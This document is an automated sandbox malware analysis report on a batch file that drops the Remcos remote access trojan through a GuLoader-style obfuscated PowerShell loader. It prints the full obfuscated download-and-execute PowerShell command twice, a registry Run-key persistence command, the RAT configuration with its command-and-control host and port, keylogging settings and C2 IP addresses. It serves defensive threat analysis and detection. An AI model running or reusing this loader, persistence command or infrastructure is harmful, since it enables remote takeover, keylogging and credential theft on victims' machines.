Windows Analysis Report
MARSS-FILTRY_ZW015010024.bat

Overview

General Information

Sample name: MARSS-FILTRY_ZW015010024.bat
Analysis ID: 1534998
MD5: 23d982d0c7540551e840392de11571ae
SHA1: 8cae67ab610dab59bf722ef2c1db09038e5a712d
SHA256: e5ebe4d8925853fc1f233a5a6f7aa29fd8a7fa3a8ad27471c7d525a70f4461b6
Tags: bat, RAT, RemcosRAT, user-abuse_ch

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MARSS-FILTRY_ZW015010024.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3664 cmdline: powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPrevaFr dr nvieHeteb aassIntesMulieI terSpinnVejeeTemp]Tord= Nit$UdviKOm aoBak lSk noHys.nSpiniBactaJehul UnpvPersaPater.chwerealsSoc, ');$Styklistens=Boendes ' ece$ Ou,URetanRenye Dicvme eaTarsn S eedispsGeldcIst eMadanTypet polIgn yLast. 
MasDHelaoSuprw umvnExoclTja o S.na RitdP,ykFHuf iPipelSwaneReg ( Nyf$UndsC ,ftaGodtf yctu .onsBackoCom,,Stri$ OraBHimmiDyregHavrePresm,rlsi ipnTykka Sp l ubl)Nonc ';$Bigeminal=$Tremmestolene;Aromastofs (Boendes 'Fl x$ TragSqualSpruO,sombDi.ea olalVaag: OdyFBlaslIndey HyrGGrsktSli.nsy.tiGlobnForbGItoie ommnDagnETrve= Exs(N ntTRetle asksTa sTSto -Spi,pFrysAI teTDiscHCirr U rk$CantbCho iInteGletveU,ilMKlveI ndNKentaUndeL Sta).ort ');while (!$Flygtningene) {Aromastofs (Boendes 'Tisk$WiwigSur l,ganoUnweb ffaaStaml Fok:SandMcockaQu nl EksiShaic mbai.egaoAb.ouEm rsD gsnNe,seFyris errs,yre1 Cal7Ch.s1 Non=Mach$SiamtE ferUndeu.ande .en ') ;Aromastofs $Styklistens;Aromastofs (Boendes ' UnlSRopeT P laMaryrAfklTRita-GeneSAfislBadeeOrchE merPVefr .eie4Inex ');Aromastofs (Boendes 'Frsk$Ma tgIntelIse,orideBRe mASma l.iau:MetrfProbLTab.YBonigImplTarbeNAftvi nuqnUndogR.une OvenTestEDruk=s.ns(teartMotoe Af SRa bT lac-UnwapErwiA SubT ishBrne Hund$Kl nBa ipIUntuGtideEAf.vM ,elIB.mbNRetrAbabyLGear)inso ') ;Aromastofs (Boendes 'Slug$ SjagGrahLDdsfORe.obBe.iAPrefLRdst:V,ntMTri iFlagKivieRVi eoFrikpEngeRSeleOUnfuC SpieForbs ChesKu.loPerfRSu rE EpirPharNQuiteEjec=tusk$P ntGsik.l omio GodbDiaga BralUnr :VesptTr kiPacec irecC,amhPiraEcrafNGalo+lic,+Nonv%Disu$VentpDowlOSyritLixiA tesFe iSBredIrivefBr.beTrolrmgleOGi.tuOpvas Blu.Roe cChemO kn,uBowlNRi sT fly ') ;$Cafuso=$Potassiferous[$Mikroprocessorerne];}$holding=324537;$Sevrdigheders=29555;Aromastofs (Boendes ' S y$ InsGrab lMegao web Na,aOuttlFort:KonsOZoopVKilueAlber ThigKnivUVi gnHe p Reva=St,k rregDo.nEHegntPlan-Pra,cLoddononsNBedetEftee RannDip,T For Kloa$ RugbUro iEgneGI,dreordem BesiFi,dnSuppaUns l ucr ');Aromastofs (Boendes 'Sick$,rndgDunklMah o SurbStrmaGattl ske:OrthBPrydaNor,kFi.at m ceMikrrMaltiEve,eUrtikHet,u Vaml OvetSensuEv lr VicsUrli Milj=Coun Disk[ArabSCoacy QuisShogta ine H,vmStri.Po.tCfordo ossnSpo vIc sety.irApokt ine] oi: avo:.sehFSprorVirkoPud mDup,BSeksaDians A oeBefa6P od4RecoSHe,etVi.irU dei B 
pnBihegUnsa(Ting$BoroOSki,v Ar.eLongrV ctgPe.ruRektn Vik).nse ');Aromastofs (Boendes 'Form$Sa ag,tomLDrifo SatBArgua aniL ost: ladtacloRPol.aTavsNL pps FoleC.taN Apon aboa eug Unse=Skat U dl[KaffsLumiYFjorsp.ast,olmeuplim ns.PtomtDet EJes X B.kTBill.OmarEObsenNodoC oruoMa kDSelvI SkrNP.osgFrot]Vejk: Min:St.fAGemmsFordCNeglIDopiiKr.e.Bar gcomie ljlTKo mSTermtCoxrRMagyIEnc nAnsog Emp(Skat$tronbOpbyA HonkrebntMaaleSelvRbevaIVierE ubkCh.nuT gelSepeTP.rtuUdmerGemeskolo) Sik ');Aromastofs (Boendes ' D m$ByggGSeculTranO tanBLrreAS.orL Sca:LagenOverOHkliN voGS ara FiglpaedaPrelCDevet hai olicClos=Mais$stroT Ek R AthA Snon ProSDecoeDelinTenoNNgs aScab.Rapas ildUTh ubDrifsSireTServr jtsis btNBillGbeky(Anbe$ RephskabO VanLDekoD R pi T kn M lG,ebr,Brmm$Sto sGloreAfbivakt R AutdScuti,quiGVoldhS preEsprdPateePneurSkibsShin)Vaab ');Aromastofs $Nongalactic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6504 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dskHLegieVoldaSpild iljeBetwrU absPlod[ ata$KlisSPaatpPrevaFr dr nvieHeteb aassIntesMulieI terSpinnVejeeTemp]Tord= Nit$UdviKOm aoBak lSk noHys.nSpiniBactaJehul UnpvPersaPater.chwerealsSoc, ');$Styklistens=Boendes ' ece$ Ou,URetanRenye Dicvme eaTarsn S eedispsGeldcIst eMadanTypet polIgn yLast. 
MasDHelaoSuprw umvnExoclTja o S.na RitdP,ykFHuf iPipelSwaneReg ( Nyf$UndsC ,ftaGodtf yctu .onsBackoCom,,Stri$ OraBHimmiDyregHavrePresm,rlsi ipnTykka Sp l ubl)Nonc ';$Bigeminal=$Tremmestolene;Aromastofs (Boendes 'Fl x$ TragSqualSpruO,sombDi.ea olalVaag: OdyFBlaslIndey HyrGGrsktSli.nsy.tiGlobnForbGItoie ommnDagnETrve= Exs(N ntTRetle asksTa sTSto -Spi,pFrysAI teTDiscHCirr U rk$CantbCho iInteGletveU,ilMKlveI ndNKentaUndeL Sta).ort ');while (!$Flygtningene) {Aromastofs (Boendes 'Tisk$WiwigSur l,ganoUnweb ffaaStaml Fok:SandMcockaQu nl EksiShaic mbai.egaoAb.ouEm rsD gsnNe,seFyris errs,yre1 Cal7Ch.s1 Non=Mach$SiamtE ferUndeu.ande .en ') ;Aromastofs $Styklistens;Aromastofs (Boendes ' UnlSRopeT P laMaryrAfklTRita-GeneSAfislBadeeOrchE merPVefr .eie4Inex ');Aromastofs (Boendes 'Frsk$Ma tgIntelIse,orideBRe mASma l.iau:MetrfProbLTab.YBonigImplTarbeNAftvi nuqnUndogR.une OvenTestEDruk=s.ns(teartMotoe Af SRa bT lac-UnwapErwiA SubT ishBrne Hund$Kl nBa ipIUntuGtideEAf.vM ,elIB.mbNRetrAbabyLGear)inso ') ;Aromastofs (Boendes 'Slug$ SjagGrahLDdsfORe.obBe.iAPrefLRdst:V,ntMTri iFlagKivieRVi eoFrikpEngeRSeleOUnfuC SpieForbs ChesKu.loPerfRSu rE EpirPharNQuiteEjec=tusk$P ntGsik.l omio GodbDiaga BralUnr :VesptTr kiPacec irecC,amhPiraEcrafNGalo+lic,+Nonv%Disu$VentpDowlOSyritLixiA tesFe iSBredIrivefBr.beTrolrmgleOGi.tuOpvas Blu.Roe cChemO kn,uBowlNRi sT fly ') ;$Cafuso=$Potassiferous[$Mikroprocessorerne];}$holding=324537;$Sevrdigheders=29555;Aromastofs (Boendes ' S y$ InsGrab lMegao web Na,aOuttlFort:KonsOZoopVKilueAlber ThigKnivUVi gnHe p Reva=St,k rregDo.nEHegntPlan-Pra,cLoddononsNBedetEftee RannDip,T For Kloa$ RugbUro iEgneGI,dreordem BesiFi,dnSuppaUns l ucr ');Aromastofs (Boendes 'Sick$,rndgDunklMah o SurbStrmaGattl ske:OrthBPrydaNor,kFi.at m ceMikrrMaltiEve,eUrtikHet,u Vaml OvetSensuEv lr VicsUrli Milj=Coun Disk[ArabSCoacy QuisShogta ine H,vmStri.Po.tCfordo ossnSpo vIc sety.irApokt ine] oi: avo:.sehFSprorVirkoPud mDup,BSeksaDians A oeBefa6P od4RecoSHe,etVi.irU dei B 
pnBihegUnsa(Ting$BoroOSki,v Ar.eLongrV ctgPe.ruRektn Vik).nse ');Aromastofs (Boendes 'Form$Sa ag,tomLDrifo SatBArgua aniL ost: ladtacloRPol.aTavsNL pps FoleC.taN Apon aboa eug Unse=Skat U dl[KaffsLumiYFjorsp.ast,olmeuplim ns.PtomtDet EJes X B.kTBill.OmarEObsenNodoC oruoMa kDSelvI SkrNP.osgFrot]Vejk: Min:St.fAGemmsFordCNeglIDopiiKr.e.Bar gcomie ljlTKo mSTermtCoxrRMagyIEnc nAnsog Emp(Skat$tronbOpbyA HonkrebntMaaleSelvRbevaIVierE ubkCh.nuT gelSepeTP.rtuUdmerGemeskolo) Sik ');Aromastofs (Boendes ' D m$ByggGSeculTranO tanBLrreAS.orL Sca:LagenOverOHkliN voGS ara FiglpaedaPrelCDevet hai olicClos=Mais$stroT Ek R AthA Snon ProSDecoeDelinTenoNNgs aScab.Rapas ildUTh ubDrifsSireTServr jtsis btNBillGbeky(Anbe$ RephskabO VanLDekoD R pi T kn M lG,ebr,Brmm$Sto sGloreAfbivakt R AutdScuti,quiGVoldhS preEsprdPateePneurSkibsShin)Vaab ');Aromastofs $Nongalactic;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6764 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 7088 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 5536 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 5704 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\gptotbreetfzdjh" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3184 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qkzzuucgsbxenxwycgm" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3436 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3792 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\amesvmmzojprqdsctrgxif" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "iniiivan.duckdns.org:53848:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-G9FJB6", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author
00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Source | Rule | Description | Author
amsi64_3664.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_6504.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings matched:
  • 0xc400:$b2: ::FromBase64String(
  • 0xb472:$s1: -join
  • 0x4c1e:$s4: +=
  • 0x4ce0:$s4: +=
  • 0x8f07:$s4: +=
  • 0xb024:$s4: +=
  • 0xb30e:$s4: +=
  • 0xb454:$s4: +=
  • 0x15149:$s4: +=
  • 0x151c9:$s4: +=
  • 0x1528f:$s4: +=
  • 0x1530f:$s4: +=
  • 0x154e5:$s4: +=
  • 0x15569:$s4: +=
  • 0xbca5:$e4: Get-WmiObject
  • 0xbe94:$e4: Get-Process
  • 0xbeec:$e4: Start-Process
  • 0x15e00:$e4: Get-Process

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\humplers
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7088, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", ProcessId: 5536, ProcessName: reg.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 185.248.196.6, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6764, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49870
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6764, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "humplers" /t REG_EXPAND_SZ /d "%Frenetic% -windowstyle 1 $Overrankness=(gp -Path 'HKCU:\Software\Procentangivelses\').Mannas;%Frenetic% ($Overrankness)", ProcessId: 7088, ProcessName: cmd.exe

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6764, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-16T13:08:16.357207+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49887 | 94.198.96.165 | 53848 | TCP
